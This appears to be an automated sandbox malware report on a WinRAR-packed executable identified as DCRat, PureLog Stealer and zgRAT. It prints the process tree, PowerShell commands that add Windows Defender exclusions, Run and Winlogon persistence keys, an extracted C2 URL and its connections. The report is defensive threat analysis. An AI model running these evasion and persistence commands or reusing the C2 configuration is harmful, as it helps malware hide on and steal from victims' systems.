Windows Analysis Report
3AAyq819Vy.exe

Overview

General Information

Sample name: 3AAyq819Vy.exe (renamed because original name is a hash value)
Original sample name: 059DD6A8CB2D31871BB82DBB158965FA.exe
Analysis ID: 1549729
MD5: 059dd6a8cb2d31871bb82dbb158965fa
SHA1: 10507debf7b1a88791b65fc08a5b995f9b873aee
SHA256: 3d92f050fc88966bd639d315d04fa9fb686ba5f61b2ac81c1e47449125a5a9cb
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files to the user root directory
Drops executable to a common third party application directory
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Program Location with Network Connections
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 3AAyq819Vy.exe (PID: 7352 cmdline: "C:\Users\user\Desktop\3AAyq819Vy.exe" MD5: 059DD6A8CB2D31871BB82DBB158965FA)
    • wscript.exe (PID: 7396 cmdline: "C:\Windows\System32\WScript.exe" "C:\hyperContaineragent\6TX15s3o3dST68MJkEj7bgGxU9zvefDuKPar5COcqC66esPk.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7592 cmdline: C:\Windows\system32\cmd.exe /c ""C:\hyperContaineragent\CYWN6IDJqLBtl0YjSrMSw1hYURgrvXzRLx.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Bridgecommon.exe (PID: 7636 cmdline: "C:\hyperContaineragent/Bridgecommon.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
          • csc.exe (PID: 7800 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 7852 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4DA.tmp" "c:\Windows\System32\CSCA1C1A0ABC4644F3ABFA5FB833E2CF3E.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • powershell.exe (PID: 2500 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 3320 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\en-GB\nFQRHbQjcuhfqIAubZpdQD.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 3336 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 5432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1900 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\nFQRHbQjcuhfqIAubZpdQD.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 2304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5332 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 2668 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • powershell.exe (PID: 5820 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\hyperContaineragent\Bridgecommon.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 5436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2172 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gMEBPrHPbx.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 7928 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 8068 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • nFQRHbQjcuhfqIAubZpdQD.exe (PID: 2212 cmdline: "C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • Bridgecommon.exe (PID: 7808 cmdline: C:\hyperContaineragent\Bridgecommon.exe MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • Bridgecommon.exe (PID: 7900 cmdline: C:\hyperContaineragent\Bridgecommon.exe MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • nFQRHbQjcuhfqIAubZpdQD.exe (PID: 8032 cmdline: "C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • nFQRHbQjcuhfqIAubZpdQD.exe (PID: 8080 cmdline: "C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • svchost.exe (PID: 6356 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • nFQRHbQjcuhfqIAubZpdQD.exe (PID: 6624 cmdline: "C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • Bridgecommon.exe (PID: 7052 cmdline: "C:\hyperContaineragent\Bridgecommon.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • nFQRHbQjcuhfqIAubZpdQD.exe (PID: 7104 cmdline: "C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • Bridgecommon.exe (PID: 7780 cmdline: "C:\hyperContaineragent\Bridgecommon.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • nFQRHbQjcuhfqIAubZpdQD.exe (PID: 7636 cmdline: "C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • Bridgecommon.exe (PID: 1816 cmdline: "C:\hyperContaineragent\Bridgecommon.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • cleanup
{"C2 url": "http://861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal", "MUTEX": "DCR_MUTEX-fMqIIZ3msKTluYQzOgJz", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source | Rule | Description | Author | Strings
3AAyq819Vy.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
3AAyq819Vy.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\hyperContaineragent\Bridgecommon.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000003.1725117408.0000000004D46000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000005.00000000.1861446770.0000000000F72000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000005.00000002.1943082141.0000000013491000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000000.00000003.1724034780.00000000063AB000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
Process Memory Space: Bridgecommon.exe PID: 7636 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
0.3.3AAyq819Vy.exe.63f9700.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.3.3AAyq819Vy.exe.63f9700.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
5.0.Bridgecommon.exe.f70000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
5.0.Bridgecommon.exe.f70000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe" , CommandLine: "C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe, NewProcessName: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe, OriginalFileName: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gMEBPrHPbx.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2172, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe" , ProcessId: 2212, ProcessName: nFQRHbQjcuhfqIAubZpdQD.exe
Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 7800, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: "C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe", EventID: 13, EventType: SetValue, Image: C:\hyperContaineragent\Bridgecommon.exe, ProcessId: 7636, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\nFQRHbQjcuhfqIAubZpdQD
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\hyperContaineragent/Bridgecommon.exe", ParentImage: C:\hyperContaineragent\Bridgecommon.exe, ParentProcessId: 7636, ParentProcessName: Bridgecommon.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe', ProcessId: 2500, ProcessName: powershell.exe
Source: Network Connection | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: DestinationIp: 37.44.238.250, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe, Initiated: true, ProcessId: 2212, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49736
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe", EventID: 13, EventType: SetValue, Image: C:\hyperContaineragent\Bridgecommon.exe, ProcessId: 7636, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\nFQRHbQjcuhfqIAubZpdQD
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: explorer.exe, "C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe", EventID: 13, EventType: SetValue, Image: C:\hyperContaineragent\Bridgecommon.exe, ProcessId: 7636, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\hyperContaineragent/Bridgecommon.exe", ParentImage: C:\hyperContaineragent\Bridgecommon.exe, ParentProcessId: 7636, ParentProcessName: Bridgecommon.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.cmdline", ProcessId: 7800, ProcessName: csc.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\hyperContaineragent/Bridgecommon.exe", ParentImage: C:\hyperContaineragent\Bridgecommon.exe, ParentProcessId: 7636, ParentProcessName: Bridgecommon.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe', ProcessId: 2500, ProcessName: powershell.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\hyperContaineragent\6TX15s3o3dST68MJkEj7bgGxU9zvefDuKPar5COcqC66esPk.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\hyperContaineragent\6TX15s3o3dST68MJkEj7bgGxU9zvefDuKPar5COcqC66esPk.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\3AAyq819Vy.exe", ParentImage: C:\Users\user\Desktop\3AAyq819Vy.exe, ParentProcessId: 7352, ParentProcessName: 3AAyq819Vy.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\hyperContaineragent\6TX15s3o3dST68MJkEj7bgGxU9zvefDuKPar5COcqC66esPk.vbe" , ProcessId: 7396, ProcessName: wscript.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\hyperContaineragent\Bridgecommon.exe, ProcessId: 7636, TargetFilename: C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.cmdline
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\hyperContaineragent/Bridgecommon.exe", ParentImage: C:\hyperContaineragent\Bridgecommon.exe, ParentProcessId: 7636, ParentProcessName: Bridgecommon.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe', ProcessId: 2500, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6356, ProcessName: svchost.exe

Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\hyperContaineragent/Bridgecommon.exe", ParentImage: C:\hyperContaineragent\Bridgecommon.exe, ParentProcessId: 7636, ParentProcessName: Bridgecommon.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.cmdline", ProcessId: 7800, ProcessName: csc.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-05T23:52:18.200573+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.4 | 49730 | TCP
2024-11-05T23:52:57.106277+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.4 | 49767 | TCP
2024-11-05T23:52:32.430448+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 37.44.238.250 | 80 | TCP

AV Detection

Source: 3AAyq819Vy.exe | Avira: detected
Source: http://861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php | Avira URL Cloud: Label: malware
Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\hyperContaineragent\6TX15s3o3dST68MJkEj7bgGxU9zvefDuKPar5COcqC66esPk.vbe | Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\hyperContaineragent\Bridgecommon.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\gMEBPrHPbx.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: 00000005.00000002.1943082141.0000000013491000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat {"C2 url": "http://861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal", "MUTEX": "DCR_MUTEX-fMqIIZ3msKTluYQzOgJz", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe | ReversingLabs: Detection: 83%
Source: C:\Program Files\Internet Explorer\en-GB\nFQRHbQjcuhfqIAubZpdQD.exe | ReversingLabs: Detection: 83%
Source: C:\ProgramData\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe | ReversingLabs: Detection: 83%
Source: C:\ProgramData\nFQRHbQjcuhfqIAubZpdQD.exe | ReversingLabs: Detection: 83%
Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe | ReversingLabs: Detection: 83%
Source: C:\Users\user\Desktop\WWLLRmVS.log | ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\tYJQSSrA.log | ReversingLabs: Detection: 23%
Source: C:\hyperContaineragent\Bridgecommon.exe | ReversingLabs: Detection: 83%
Source: 3AAyq819Vy.exe | ReversingLabs: Detection: 65%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.6% probability
Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe | Joe Sandbox ML: detected
Source: C:\Windows\System32\SecurityHealthSystray.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\izhrsOEp.log | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe | Joe Sandbox ML: detected
Source: C:\hyperContaineragent\Bridgecommon.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\EEEoXuLc.log | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe | Joe Sandbox ML: detected
Source: 3AAyq819Vy.exe | Joe Sandbox ML: detected
Source: 3AAyq819Vy.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\hyperContaineragent\Bridgecommon.exe | Directory created: C:\Program Files\Internet Explorer\en-GB\nFQRHbQjcuhfqIAubZpdQD.exe
Source: C:\hyperContaineragent\Bridgecommon.exe | Directory created: C:\Program Files\Internet Explorer\en-GB\039065625c59a1
Source: 3AAyq819Vy.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 3AAyq819Vy.exe
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.pdb source: Bridgecommon.exe, 00000005.00000002.1911325001.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp

Spreading

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Users\user\Desktop\3AAyq819Vy.exe | Code function: 0_2_00CAA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00CAA69B
